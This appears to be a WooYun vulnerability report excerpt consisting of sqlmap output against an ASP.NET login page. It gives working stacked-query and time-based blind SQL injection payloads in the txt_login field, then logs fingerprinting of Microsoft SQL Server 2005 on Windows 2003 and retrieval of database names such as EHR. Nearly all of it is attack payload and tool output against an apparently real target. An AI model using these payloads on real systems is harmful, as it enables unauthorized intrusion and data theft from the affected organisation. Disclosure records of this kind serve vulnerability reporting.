WooYun.org

---
Place: POST
Parameter: txt_login
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKLTE2NDY1OTAyMg9kFgICAw8PFgIeBFRleHRlZGRkb8wYah
Z9wO+L+TZBoYkL1G/ZFQ=&__EVENTVALIDATION=/wEWCAKXhd25DgLjwvDQCAK6m6qxCQKZ9L3HBwK
nKuBAwLD8cTdDQKSuuDUCwLR85rUBK/UFwHy8RkT4LjAyXdGmQbPd5sK&txt_login=admin'; WAIT
OR DELAY '0:0:5';-- AND 'kqVv'='kqVv&txt_pwd=admin&ddl_type=销售代表&submitButt
n=登录
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKLTE2NDY1OTAyMg9kFgICAw8PFgIeBFRleHRlZGRkb8wYah
Z9wO+L+TZBoYkL1G/ZFQ=&__EVENTVALIDATION=/wEWCAKXhd25DgLjwvDQCAK6m6qxCQKZ9L3HBwK
nKuBAwLD8cTdDQKSuuDUCwLR85rUBK/UFwHy8RkT4LjAyXdGmQbPd5sK&txt_login=admin' WAITF
R DELAY '0:0:5'-- AND 'OLon'='OLon&txt_pwd=admin&ddl_type=销售代表&submitButton
登录
---
[21:56:27] [INFO] testing MySQL
[21:56:27] [WARNING] the back-end DBMS is not MySQL
[21:56:27] [INFO] testing Oracle
[21:56:28] [WARNING] the back-end DBMS is not Oracle
[21:56:28] [INFO] testing PostgreSQL
[21:56:28] [WARNING] the back-end DBMS is not PostgreSQL
[21:56:28] [INFO] testing Microsoft SQL Server
[21:56:33] [INFO] confirming Microsoft SQL Server
[21:56:43] [WARNING] adjusting time delay to 3 seconds
[21:56:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[21:56:44] [INFO] fetching database names
[21:56:44] [INFO] fetching number of databases
[21:56:44] [INFO] retrieved: 17
[21:56:56] [INFO] retrieved: db_question
[21:59:34] [INFO] retrieved: db_question_tvc
[22:03:14] [INFO] retrieved: EHR
[22:03:50] [INFO] retrieved: hhas